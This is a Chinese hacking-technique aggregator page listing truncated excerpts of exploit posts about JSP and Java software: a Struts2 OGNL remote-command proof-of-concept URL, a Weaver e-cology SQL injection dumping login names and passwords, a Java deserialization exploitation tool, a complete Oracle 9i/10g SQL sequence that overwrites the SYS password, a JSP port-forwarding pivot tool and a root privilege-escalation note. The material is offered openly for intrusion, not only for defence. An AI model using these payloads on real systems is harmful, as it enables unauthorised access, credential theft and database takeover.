记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Struts2 最新漏洞S037分析!

AT: PKAV-香草 无声说安全 发现struts2又出了新漏洞S2-033 官方的的意思是说如果使用了REST插件并且开启了动态方法执行 但是经过研究发现,其实并不需要开启动态方法执行,因此可以通杀所有安装了REST的struts2,包括官方认为不存在漏洞的 Struts 2.3.20.3, 2.3.24.3 and 2.3.28.1 。官方认为的s033的POC是这样的: http://127.0.0.1:8888/struts2-rest-showcase/orders/3!%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec(%23param
发布时间:2016-06-17 00:55 | 阅读:95838 | 评论:0 | 标签:JSP Others s037 Struts2 漏洞

泛微e-cology v8直接获取数据的SQL注入漏洞

漏洞作者: rootsec 详细说明: 泛微e-cology oa系统/hrm/resource/HrmResourceContactEdit.jsp页面id参数存在sql注入漏洞,攻击者可以通过此漏洞提升当前用户权限、获取数据库内容等操作 漏洞证明: http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?id=119%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,
发布时间:2016-04-04 01:25 | 阅读:128603 | 评论:0 | 标签:JSP e-cology Sql 泛微 注入 漏洞

Java反序列化工具

from: wooyaa.me 0X00 概述 Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。FreeBuf上已经公开了JBoss反序列化执行命令回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。 本工具暂时支持的功能: 1、本地命令执行并回显,无须加载外部jar包,支持纯内网环境检测。 2、支持JBoss、WebSphere和Weblogic的反序列化漏洞检测。 3、支持https数据传输。 4、支持文件目录列表。   0X01 WebSphere的反序列化漏洞利用
发布时间:2016-01-04 14:55 | 阅读:173234 | 评论:0 | 标签:JSP Java JBoss WebLogic websphere 反序列化 工具

Java反序列化时对象注入可以造成代码执行漏洞

0x00 背景 这几天在zone看到了有人提及了有关于common-collections包的RCE漏洞,并且http://zone.wooyun.org/content/23849给出了具体的原理。作为一个业余的安全研究人员,除了会利用之外,还可以探究一下背后的原理。 0x01 原理 Java反序列化导致的漏洞原理上和PHP反序列一样,也是由于用户的输入可以控制我们传入的对象。如果服务端程序没有对用户可控的序列化代码进行校验而是直接进行反序列化使用,并且程序中运行一些比较危险的逻辑(如eval,登录验证等),就会触发一些意想不到的漏洞。实际上,这并不是什么新的问题了,有关于Java中的反序列化导致的漏洞可以看https://speakerdeck.com/player/2630612322be4a2696
发布时间:2015-11-12 11:45 | 阅读:230997 | 评论:0 | 标签:JSP Linux/Unix unserialize() 反序列号 注入 漏洞

Oracle 9i/10g Oracle越权修改SYS密码

exp地址https://www.exploit-db.com/exploits/4203/ 首先用一个低权限账户比如DBSNMP登录Oracle 然后执行SQL create or replace view bunkerview as select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name; update bunkerview set password='8A8F025737A9097A' where name='SYS'; drop view bunkerview; commit;就可以用sys账户密码为oracle开开心心地登录Oracle了
发布时间:2015-09-29 14:30 | 阅读:88237 | 评论:0 | 标签:JSP Linux/Unix Windows oracle

大汉政府信息公开多处SQL注入

主要是webservice漏洞,漏洞存在于 1./xxgk/services/WSSync_xxgk?wsdl 该WSSync_xxgk服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在。 wsGetWeb getClientIpAxis wsGetColumn wsGetColumnStyle wsSynchronize wsSynchronizeWithPath wsSync 上述方法的多个参数均存在漏洞,随便选取一个方法进行测试 /xxgk/services/WSSync_xxgk?wsdl wsGetColumn方法 用WSockExpert v0.7抓包,并保存为wooyun.txt POST /xxgk/services/WSSync_xxgk?wsdl HTTP/1.1 Accept-Enc
发布时间:2015-07-25 03:15 | 阅读:111324 | 评论:0 | 标签:JSP 0day 信息公开 大汉 大汉政府 大汉版通 注入

JSP端口转发工具 – KPortTran

渗透过程中,由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能,具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说,可以比较方便的实现端口转发。在这里发布出来,小伙伴们使用过程中,如果发现什么bug欢迎提交哈~参数说明/KPortTran.jsp?lip = local ip / 本地ip //一般为内网主机IPlp = local port / 本地端口 //一般为内网主机端口rip = remote ip / 远程ip //一般为外网连接者IP,或者内网其他主机rp = remo
发布时间:2013-10-29 12:05 | 阅读:113119 | 评论:0 | 标签:工具 jsp 安全工具 端口转发

对某root权限shell的进一步提权(jsp)

对方环境:Readhat+Tomcat+JSP+MYSQL5   shell是root系统权限 也许有的同学问,都是root了还进一步~进到哪? 嗯~说下把,jsp的shell 我没见过能直接执行shell命令的.. 包括法克工具包里面的jsp shell 大多数都是改了下版权的一个jsFolder~~好吧 不吐槽了,在这种情况下呢,我们要远程登陆他的ssh 需要怎么做?   嗯 一般人都懂,直接编辑/etc/passwd和/etc/shadow呗~好吧   通过搜索 发现网上转来转去的并无效果,也就是通常说的无密码即可进入的添加账号~本人测试未果,也许人品?不管~进入backtrack5 直接 cat /etc/passwd 复制root那一行 然后继续 cat /
发布时间:2013-07-27 12:40 | 阅读:182903 | 评论:1 | 标签:黑客攻防 jsp root shell 提权

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云